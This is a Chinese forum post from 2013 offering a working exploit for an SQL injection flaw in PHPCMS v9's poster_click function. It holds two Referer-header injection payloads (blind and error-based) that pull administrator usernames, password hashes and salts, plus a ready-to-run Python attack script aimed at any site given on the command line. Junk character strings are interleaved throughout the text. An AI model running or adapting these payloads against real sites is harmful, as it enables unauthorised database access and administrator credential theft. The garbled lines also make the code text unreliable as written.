有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
* ]6 L7 i+ N. V2 g: X, ?; g& I0 w7 T( O1 A8 N5 N. w3 \6 _3 x
问题函数\phpcms\modules\poster\index.php
0 U5 R6 x5 b7 H9 Q, N- f4 G2 p- L1 p7 g$ y( J0 Y
public function poster_click() {
) P; G2 v8 p) i7 U* Y$id = isset($_GET['id']) ? intval($_GET['id']) : 0;- R- i6 ?9 S% q, `7 f
$r = $this->db->get_one(array('id'=>$id));
1 w6 ?; N6 G# U! m8 }; D- K! s+ oif (!is_array($r) && empty($r)) return false;
0 K* ?& G8 j" s4 f$ip_area = pc_base::load_sys_class('ip_area');( j7 @) W+ I5 d& T& s/ a; M5 b/ u
$ip = ip();2 Y* h5 `. j3 C, ~; e
$area = $ip_area->get($ip);5 ~+ e3 i- Q8 v% z
$username = param::get_cookie('username') ? param::get_cookie('username') : '';& r9 k2 a% d( U9 B/ D0 Z' S9 w# o; b
if($id) {7 H! ~- m5 P, E' v6 Q: f
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
, b8 y6 B& R6 R0 M& N' ^$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
( J- @% _! u8 c4 b}
7 S0 m% z1 T3 d c$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));# b2 B1 i& `# A' e9 z7 W* E; o
$setting = string2array($r['setting']);3 r: o9 t$ f. {* c# H$ [1 M
if (count($setting)==1) {8 K* g8 E$ S' `5 Y, V
$url = $setting['1']['linkurl'];7 ?, y( d2 c! ~" d* o/ @
} else {
5 m3 \ e5 p, [$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];4 U y6 z3 p# E1 z5 x( x7 K
}
3 i4 l- v9 W: e! d2 _& I! I% a7 _header('Location: '.$url);' M3 W2 c8 H2 d+ ]# W% t! Q
}3 m* y3 T) P/ t4 l8 O3 h4 }
, |1 {, E, r& x* n* b
5 k; V7 i5 N! A N& A( C
& S% \+ D" e4 X' X$ ~0 l/ z$ \4 p8 d
利用方式:
2 {7 t! G, `7 q; X* D' m0 A
) O) h5 W: j4 ?% @" t1 L& V1、可以采用盲注入的手法:
4 S8 G- P) I: }' f! x0 x( R f3 [( Z/ l4 D- a { _
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
7 c8 j) Y$ v+ j! c- R* b
0 j4 v' U4 ~( R. t; s4 M; P$ s通过返回页面,正常与否一个个猜解密码字段。
" N$ K. e0 J; ^# i I
8 n. _! x X& [- R% X8 `2、代码是花开写的,随手附上了:
* I# G- q" @; v4 L/ G! ]$ C3 u+ l6 D% o. K3 l2 u* b0 n# Z. }2 q
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#) r3 q' P2 R- D0 b
. d( S+ w& d$ m3 s, m5 G- d2 y
此方法是爆错注入手法,原理自查。, V. Z3 T. ?1 z" F/ i/ O
* D3 \' S& K! D9 Z c9 [/ b0 S* a: Y, e7 o1 i
4 H1 B" h5 h& }7 {5 t0 l利用程序:7 p! ] x5 x, }6 d/ S
2 m' c/ U: T+ C; k) ]/ Z% M2 Y% K' c* A#!/usr/bin/env python9 _. F* P( z, i
import httplib,sys,re- ^, f1 H8 |, y* ]8 `1 F0 n
& P/ o$ G( z% ]; J/ B3 ]! jdef attack():) n$ r" e- J; x
print “Code by Pax.Mac Team conqu3r!”& G( |' A4 a1 G5 k+ ^ B }
print “Welcome to our zone!!!”
: B2 w0 M; P2 P) h6 E) b$ rurl=sys.argv[1]% T9 k+ ~& x! P( C
paths=sys.argv[2]
2 k. p3 _9 ^+ C" v. t( f1 A- e+ C. ^& qconn = httplib.HTTPConnection(url)
2 S D( M2 c* { f+ O' B( f% p- Q% Gi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,- q- A0 }6 }2 f! Z& S* ^
“Accept”: “text/plain”,
5 {- R. k/ S. E: H; F“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
& I$ w2 y1 Y r1 P* ]& X! [ |7 S/ Tconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)6 h& H! D i+ ^1 @" L9 L0 u7 s
r1 = conn.getresponse()
( {8 l) N$ F3 D. gdatas=r1.read()9 c7 W1 y4 R) Y9 E z
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
+ H% r. F9 ?4 O. E/ Zprint datas[0]
* Z/ C4 L' J. e# k m+ Q9 Bconn.close()( k' e8 ?- K. e# W3 g: @
if __name__==”__main__”:
9 v1 j0 { ^' V+ {9 ]if len(sys.argv)<3:
9 P+ D: w# `/ c% Rprint “Code by Pax.Mac Team conqu3r”* z+ j; ]0 ?& m4 K' P" Q- g' W
print “Usgae:”
/ P8 S$ D% Q: X! {print “ phpcmsattack.py www.paxmac.org /”
* I. Q/ z' s7 L, ~; L( U3 iprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
0 i. q. |$ R* ~. v/ w- usys.exit(1)! [, f. J4 j' J1 f
attack()
* U) k9 @" {' n9 R$ v9 R* ?" D" G
' C1 ~1 J- s7 L) U/ }! Y5 e |
发表于 2013-1-11 21:01:00
收藏
支持
反对